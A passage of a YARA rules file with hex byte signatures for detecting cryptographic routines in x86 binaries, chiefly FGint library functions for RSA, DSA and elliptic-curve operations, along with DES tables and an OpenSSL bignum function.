FC 8B 45 FC E8 ?? ?? ?? ?? 33 C0 55 68 0F 42 45 00 64 FF 30 64 89 20 EB 12 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 E8 ?? ?? ?? ?? 8B 45 FC 8A 00 2C 2D 74 11 04 FD 2C 0A 72 0B 8B 45 FC E8 ?? ?? ?? ?? 48 7F D4 8D 45 E4 50 B9 01 00 00 00 BA 01 00 00 00 8B 45 FC E8 ?? ?? ?? ?? 8B 45 E4 BA 28 42 45 00 E8 ?? ?? ?? ?? 75 18 C6 45 EB 00 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 E8 ?? ?? ?? ?? EB 18 C6 45 EB 01 }\r\n\t\t$c2 = { 55 8B EC 83 C4 D8 53 56 33 C9 89 4D D8 89 4D DC 89 4D E0 89 4D F8 89 4D F4 8B DA 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 33 C0 55 68 A6 32 47 00 64 FF 30 64 89 20 EB 12 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 E8 ?? ?? ?? ?? 8B 45 FC 0F B6 00 2C 2D 74 11 04 FD 2C 0A 72 0B 8B 45 FC E8 ?? ?? ?? ?? 48 7F D3 8D 45 E0 50 B9 01 00 00 00 BA 01 00 00 00 8B 45 FC E8 ?? ?? ?? ?? 8B 45 E0 BA BC 32 47 00 E8 ?? ?? ?? ?? 75 18 C6 45 E9 00 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 E8 ?? ?? ?? ?? EB 18 C6 45 E9 01 }\r\n\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule FGint_ConvertBase256to64\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint ConvertBase256to64\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 81 C4 EC FB FF FF 53 56 57 33 C9 89 8D EC FB FF FF 89 8D F0 FB FF FF 89 4D F8 8B FA 89 45 FC B9 00 01 00 00 8D 85 F4 FB FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 F4 FB FF FF BA FF 00 00 00 E8 ?? ?? ?? ?? 8D 45 F8 E8 ?? ?? ?? ?? 8B 45 FC E8 ?? ?? ?? ?? 8B D8 85 DB 7E 2F BE 01 00 00 00 8D 45 F8 8B 55 FC 0F B6 54 32 FF 8B 94 95 F4 FB FF FF E8 ?? ?? ?? ?? 46 4B 75 E5 EB }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_ConvertHexStringToBase256String\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.2\"\r\n\t\tdescription = \"FGint ConvertHexStringToBase256String\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F0 53 56 33 C9 89 4D F0 89 55 F8 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 F8 E8 ?? ?? ?? ?? 8B 45 FC E8 ?? ?? ?? ?? D1 F8 79 03 83 D0 00 85 C0 7E 5F 89 45 F4 BE 01 00 00 00 8B C6 03 C0 8B 55 FC 8A 54 02 FF 8B 4D FC 8A 44 01 FE 3C 3A 73 0A 8B D8 80 EB 30 C1 E3 04 EB 08 8B D8 80 EB 37 C1 E3 04 80 FA 3A 73 07 80 EA 30 0A DA EB 05 80 EA 37 0A DA 8D 45 F0 8B D3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_Base256StringToGInt\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint Base256StringToGInt\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 81 C4 F8 FB FF FF 53 56 57 33 C9 89 4D F8 8B FA 89 45 FC 8B 45 FC ?? ?? ?? ?? ?? B9 00 01 00 00 8D 85 F8 FB FF FF 8B 15 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 55 ?? ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 F8 ?? ?? ?? ?? ?? 8D 85 F8 FB FF FF BA FF 00 00 00 ?? ?? ?? ?? ?? 8B 45 FC ?? ?? ?? ?? ?? 8B D8 85 DB 7E 34 BE 01 00 00 00 8D 45 F8 8B 55 FC 0F B6 54 32 FF 8B 94 95 F8 FB FF FF ?? ?? ?? ?? ?? 46 4B 75 E5 EB 12 8D 45 F8 B9 01 00 00 00 BA 01 00 00 00 ?? ?? ?? ?? ?? 8B 45 F8 80 38 30 75 0F }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_FGIntToBase256String\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.2\"\r\n\t\tdescription = \"FGint FGIntToBase256String\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 33 C9 51 51 51 51 53 56 8B F2 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8D 55 FC E8 ?? ?? ?? ?? EB 10 8D 45 FC 8B 4D FC BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 FC E8 ?? ?? ?? ?? 25 07 00 00 80 79 05 48 83 C8 F8 40 85 C0 75 D8 8B 45 FC E8 ?? ?? ?? ?? 8B D8 85 DB 79 03 83 C3 07 C1 FB 03 8B C6 E8 ?? ?? ?? ?? 85 DB 76 4B 8D 45 F4 50 B9 08 00 00 00 BA 01 00 00 00 8B 45 FC E8 ?? ?? ?? ?? 8B 55 F4 8D 45 FB E8 ?? ?? ?? ?? 8D 45 F0 8A 55 FB E8 ?? ?? ?? ?? 8B 55 F0 8B C6 E8 ?? ?? ?? ?? 8D 45 FC B9 08 00 00 00 BA 01 00 00 00 E8 ?? ?? ?? ?? 4B 75 B5 }\r\n\t\t$c1 = { 55 8B EC 33 C9 51 51 51 51 53 56 8B F2 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8D 55 FC E8 ?? ?? ?? ?? EB 10 8D 45 FC 8B 4D FC BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 FC E8 ?? ?? ?? ?? 25 07 00 00 80 79 05 48 83 C8 F8 40 85 C0 75 D8 8B 45 FC 85 C0 74 05 83 E8 04 8B 00 8B D8 85 DB 79 03 83 C3 07 C1 FB 03 8B C6 E8 ?? ?? ?? ?? 85 DB 76 4C 8D 45 F4 50 B9 08 00 00 00 BA 01 00 00 00 8B 45 FC E8 ?? ?? ?? ?? 8B 55 F4 8D 45 FB E8 ?? ?? ?? ?? 8D 45 F0 0F B6 55 FB E8 ?? ?? ?? ?? 8B 55 F0 8B C6 E8 ?? ?? ?? ?? 8D 45 FC B9 08 00 00 00 BA 01 00 00 00 E8 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule FGint_ConvertBase256StringToHexString\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint ConvertBase256StringToHexString\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 33 C9 51 51 51 51 51 51 53 56 57 8B F2 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B C6 E8 ?? ?? ?? ?? 8B 45 FC E8 ?? ?? ?? ?? 8B F8 85 FF 0F 8E AB 00 00 00 C7 45 F8 01 00 00 00 8B 45 FC 8B 55 F8 8A 5C 10 FF 33 C0 8A C3 C1 E8 04 83 F8 0A 73 1E 8D 45 F4 33 D2 8A D3 C1 EA 04 83 C2 30 E8 ?? ?? ?? ?? 8B 55 F4 8B C6 E8 ?? ?? ?? ?? EB 1C 8D 45 F0 33 D2 8A D3 C1 EA 04 83 C2 37 E8 ?? ?? ?? ?? 8B 55 F0 8B C6 E8 ?? ?? ?? ?? 8B C3 24 0F 3C 0A 73 22 8D 45 EC 8B D3 80 E2 0F 81 E2 FF 00 00 00 83 C2 30 E8 ?? ?? ?? ?? 8B 55 EC 8B C6 E8 ?? ?? ?? ?? EB 20 8D 45 E8 8B D3 80 E2 0F 81 E2 FF 00 00 00 83 C2 37 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule FGint_PGPConvertBase256to64\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2016-08\"\r\n\t\tdescription = \"FGint PGPConvertBase256to64\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 81 C4 E8 FB FF FF 53 56 57 33 C9 89 8D E8 FB FF FF 89 4D F8 89 4D F4 89 4D F0 8B FA 89 45 FC B9 00 01 00 00 8D 85 EC FB FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 EC FB FF FF BA FF 00 00 00 E8 ?? ?? ?? ?? 8D 45 F8 E8 ?? ?? ?? ?? 8B 45 FC 8B 00 E8 ?? ?? ?? ?? 8B D8 85 DB 7E 22 BE 01 00 00 00 8D 45 F8 8B 55 FC 8B 12 0F B6 54 32 FF 8B 94 95 EC FB FF FF E8 ?? ?? ?? ?? 46 4B 75 E3 8B 45 F8 E8 ?? ?? ?? ?? B9 06 00 00 00 99 F7 F9 85 D2 75 0A 8D 45 F0 E8 ?? ?? ?? ?? EB 4B 8B 45 F8 E8 ?? ?? ?? ?? B9 06 00 00 00 99 F7 F9 83 FA 04 75 1C 8D 45 F8 BA 4C 33 40 00 E8 ?? ?? ?? ?? 8D 45 F0 BA 58 33 40 00 E8 ?? ?? ?? ?? EB 1A 8D 45 F8 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 F0 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? B9 06 00 00 00 99 F7 F9 8B D8 85 DB 7E 57 8D 45 F4 50 B9 06 00 00 00 BA 01 00 00 00 8B 45 F8 E8 ?? ?? ?? ?? 8D 45 EC 8B 55 F4 E8 ?? ?? ?? ?? 8D 85 E8 FB FF FF 8B 55 EC 8A 92 ?? ?? ?? ?? E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule FGint_RSAEncrypt\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint RSAEncrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 D0 53 56 57 33 DB 89 5D D0 89 5D DC 89 5D D8 89 5D D4 8B F9 89 55 F8 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 E0 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 DC 8B C7 E8 ?? ?? ?? ?? 8B 45 DC E8 ?? ?? ?? ?? 8B D8 8D 55 DC 8B 45 FC E8 ?? ?? ?? ?? 8D 45 DC 8B 4D DC BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F3 4E EB 10 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_RsaDecrypt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"FGint RsaDecrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 A0 53 56 57 33 DB 89 5D A0 89 5D A4 89 5D A8 89 5D B4 89 5D B0 89 5D AC 89 4D F8 8B FA 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 B8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_RSAVerify\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"FGint RSAVerify\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 E0 53 56 8B F1 89 55 F8 89 45 FC 8B 5D 0C 8B 45 FC E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 E8 8B 45 F8 E8 ?? ?? ?? ?? 8D 55 F0 8B 45 FC E8 ?? ?? ?? ?? 8D 4D E0 8B D3 8D 45 F0 E8 ?? ?? ?? ?? 8D 55 F0 8D 45 E0 E8 ?? ?? ?? ?? 8D 45 E0 50 8B CB 8B D6 8D 45 E8 E8 ?? ?? ?? ?? 8D 55 E8 8D 45 E0 E8 ?? ?? ?? ?? 8D 55 F0 8D 45 E8 E8 ?? ?? ?? ?? 3C 02 8B 45 08 0F 94 00 8D 45 E8 E8 ?? ?? ?? ?? 8D 45 F0 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? B9 03 00 00 00 E8 ?? ?? ?? ?? 8D 45 F8 BA 02 00 00 00 E8 ?? ?? ?? ?? C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_FindPrimeGoodCurveAndPoint\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tdescription = \"FGint FindPrimeGoodCurveAndPoint\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F4 53 56 57 33 DB 89 5D F4 89 4D FC 8B FA 8B F0 33 C0 55 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_ECElGamalEncrypt\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2016-08\"\r\n\t\tdescription = \"FGint ECElGamalEncrypt\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 81 C4 3C FF FF FF 53 56 57 33 DB 89 5D D8 89 5D D4 89 5D D0 8B 75 10 8D 7D 8C A5 A5 A5 A5 A5 8B 75 14 8D 7D A0 A5 A5 A5 A5 A5 8B 75 18 8D 7D DC A5 A5 8B 75 1C 8D 7D E4 A5 A5 8B F1 8D 7D EC A5 A5 8B F2 8D 7D F4 A5 A5 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 A0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 8C 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 78 FF FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 64 FF FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 50 FF FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 3C FF FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 BC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 B4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 7D CF }\r\n\t\t$c1 = { 55 8B EC 83 C4 A8 53 56 57 33 DB 89 5D A8 89 5D AC 89 5D BC 89 5D B8 89 5D B4 89 4D F4 89 55 F8 89 45 FC 8B 75 0C 8B 45 FC E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 71 14 41 00 64 FF 30 64 89 20 8D 55 BC 8B C6 E8 ?? ?? ?? ?? 8B 45 BC E8 ?? ?? ?? ?? 8B D8 8D 55 BC 8B 45 FC E8 ?? ?? ?? ?? 8D 45 BC 8B 4D BC BA 8C 14 41 00 E8 ?? ?? ?? ?? 8B FB 4F EB 10 8D 45 BC 8B 4D BC BA 98 14 41 00 E8 ?? ?? ?? ?? 8B 45 BC }\r\n\tcondition:\r\n\t\t$c0 or $c1\r\n}\r\n\r\nrule FGint_ECAddPoints\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tdescription = \"FGint ECAddPoints\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 A8 53 56 57 8B 75 0C 8D 7D F0 A5 A5 8B F1 8D 7D F8 A5 A5 8B F2 8D 7D A8 A5 A5 A5 A5 A5 8B F0 8D 7D BC A5 A5 A5 A5 A5 8B 5D 08 8D 45 BC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 A8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 F8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D8 8B 15 ?? ?? ?? ?? E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_ECPointKMultiple\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tdescription = \"FGint ECPointKMultiple\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 BC 53 56 57 33 DB 89 5D E4 8B 75 0C 8D 7D E8 A5 A5 8B F1 8D 7D F0 A5 A5 8B F2 8D 7D F8 A5 A5 8B F0 8D 7D D0 A5 A5 A5 A5 A5 8B 5D 08 8D 45 D0 8B 15 ?? ?? ?? 00 E8 ?? ?? ?? ?? 8D 45 F8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 BC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_ECPointDestroy\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tdescription = \"FGint ECPointDestroy\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 53 8B D8 8B C3 E8 ?? ?? ?? ?? 8D 43 08 E8 ?? ?? ?? ?? 5B C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_DSAPrimeSearch\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2016-08\"\r\n\t\tdescription = \"FGint DSAPrimeSearch\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 DC 53 56 8B DA 8B F0 8D 45 F8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 4D F8 8B D6 8B C6 E8 ?? ?? ?? ?? 8D 4D E8 8B D6 8B C3 E8 ?? ?? ?? ?? 8D 55 F0 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D E0 8D 55 E8 8B C3 E8 ?? ?? ?? ?? 8D 45 E8 E8 ?? ?? ?? ?? 8D 4D E8 8D 55 F0 8D 45 E0 E8 ?? ?? ?? ?? 8D 45 E0 E8 ?? ?? ?? ?? 8D 45 F0 E8 ?? ?? ?? ?? 8B 45 EC 8B 40 04 83 E0 01 85 C0 75 18 8D 4D E0 8B D6 8D 45 E8 E8 ?? ?? ?? ?? 8D 55 E8 8D 45 E0 E8 ?? ?? ?? ?? 8B D3 8D 45 E8 E8 ?? ?? ?? ?? C6 45 DF 00 EB 26 8D 4D E8 8D 55 F8 8B C3 E8 ?? ?? ?? ?? 8B D3 8D 45 E8 E8 ?? ?? ?? ?? 8D 4D DF 8B C3 BA 05 00 00 00 E8 ?? ?? ?? ?? 80 7D DF 00 74 D4 8D 45 F8 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? B9 04 00 00 00 E8 ?? ?? ?? ?? C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_DSASign\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2016-08\"\r\n\t\tdescription = \"FGint DSASign\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 CC 53 56 57 89 4D FC 8B DA 8B F8 8B 75 14 8B 45 10 E8 ?? ?? ?? ?? 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 CC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 F4 50 8B CF 8B D6 8B 45 FC E8 ?? ?? ?? ?? 8D 4D D4 8B D3 8D 45 F4 E8 ?? ?? ?? ?? 8D 45 F4 E8 ?? ?? ?? ?? 8D 4D F4 8B D3 8B C6 E8 ?? ?? ?? ?? 8D 55 EC 8B 45 10 E8 ?? ?? ?? ?? 8D 45 E4 50 8B CB 8D 55 D4 8B 45 18 E8 ?? ?? ?? ?? 8D 4D DC 8D 55 E4 8D 45 EC E8 ?? ?? ?? ?? 8D 45 EC E8 ?? ?? ?? ?? 8D 45 E4 E8 ?? ?? ?? ?? 8D 45 CC 50 8B CB 8D 55 DC 8D 45 F4 E8 ?? ?? ?? ?? 8D 45 F4 E8 ?? ?? ?? ?? 8D 45 DC E8 ?? ?? ?? ?? 8B 55 0C 8D 45 D4 E8 ?? ?? ?? ?? 8B 55 08 8D 45 CC E8 ?? ?? ?? ?? 8D 45 D4 E8 ?? ?? ?? ?? 8D 45 CC E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 CC 8B 15 ?? ?? ?? ?? B9 06 00 00 00 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_DSAVerify\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2016-08\"\r\n\t\tdescription = \"FGint DSAVerify\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 B4 53 56 57 89 4D FC 8B DA 8B F0 8B 7D 08 8B 45 14 E8 ?? ?? ?? ?? 8B 45 10 E8 ?? ?? ?? ?? 8B 45 0C E8 ?? ?? ?? ?? 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 CC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 BC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 B4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 CC 8B 45 0C E8 ?? ?? ?? ?? 8D 4D F4 8B D3 8D 45 CC E8 ?? ?? ?? ?? 8D 55 C4 8B 45 14 E8 ?? ?? ?? ?? 8D 45 EC 50 8B CB 8D 55 F4 8D 45 C4 E8 ?? ?? ?? ?? 8D 45 C4 E8 ?? ?? ?? ?? 8D 55 D4 8B 45 10 E8 ?? ?? ?? ?? 8D 45 E4 50 8B CB 8D 55 F4 8D 45 D4 E8 ?? ?? ?? ?? 8D 45 F4 E8 ?? ?? ?? ?? 8D 45 C4 50 8B CE 8D 55 EC 8B 45 FC E8 ?? ?? ?? ?? 8D 45 BC 50 8B CE 8D 55 E4 8B 45 18 E8 ?? ?? ?? ?? 8D 45 B4 50 8B CE 8D 55 BC 8D 45 C4 E8 ?? ?? ?? ?? 8D 45 C4 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule DES_Long\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"DES [long]\"\r\n\tstrings:\r\n\t\t$c0 = { 10 80 10 40 00 00 00 00 00 80 10 00 00 00 10 40 10 00 00 40 10 80 00 00 00 80 00 40 00 80 10 00 00 80 00 00 10 00 10 40 10 00 00 00 00 80 00 40 10 00 10 00 00 80 10 40 00 00 10 40 10 00 00 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DES_sbox\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"DES [sbox]\"\r\n\tstrings:\r\n\t\t$c0 = { 00 04 01 01 00 00 00 00 00 00 01 00 04 04 01 01 04 00 01 01 04 04 01 00 04 00 00 00 00 00 01 00 00 04 00 00 00 04 01 01 04 04 01 01 00 04 00 00 04 04 00 01 04 00 01 01 00 00 00 01 04 00 00 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DES_pbox_long\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"DES [pbox] [long]\"\r\n\tstrings:\r\n\t\t$c0 = { 0F 00 00 00 06 00 00 00 13 00 00 00 14 00 00 00 1C 00 00 00 0B 00 00 00 1B 00 00 00 10 00 00 00 00 00 00 00 0E 00 00 00 16 00 00 00 19 00 00 00 04 00 00 00 11 00 00 00 1E 00 00 00 09 00 00 00 01 00 00 00 07 00 00 00 17 00 00 00 0D 00 00 00 1F 00 00 00 1A 00 00 00 02 00 00 00 08 00 00 00 12 00 00 00 0C 00 00 00 1D 00 00 00 05 00 00 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_BN_mod_exp2_mont\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"OpenSSL BN_mod_exp2_mont\"\r\n\tstrings:\r\n\t\t$c0 = { B8 30 05 00 00 E8 ?? ?? ?? ?? 8B 84 24 48 05 00 00 53 33 DB 56 8B 08 57 89 5C 24 24 89 5C 24 30 8A 01 89 5C 24 28 A8 01 89 5C 24 0C 75 24 68 89 00 00 00 68 ?? ?? ?? ?? 6A 66 6A 76 6A 03 E8 ?? ?? ?? ?? 83 C4 14 33 C0 5F 5E 5B 81 C4 30 05 00 00 C3 8B 94 24 48 05 00 00 52 E8 ?? ?? ?? ?? 8B F0 8B 84 24 54 05 00 00 50 E8 ?? ?? ?? ?? 83 C4 08 3B F3 8B F8 75 20 3B FB 75 1C 8B 8C 24 40 05 00 00 6A 01 51 E8 ?? ?? ?? ?? 83 C4 08 5F 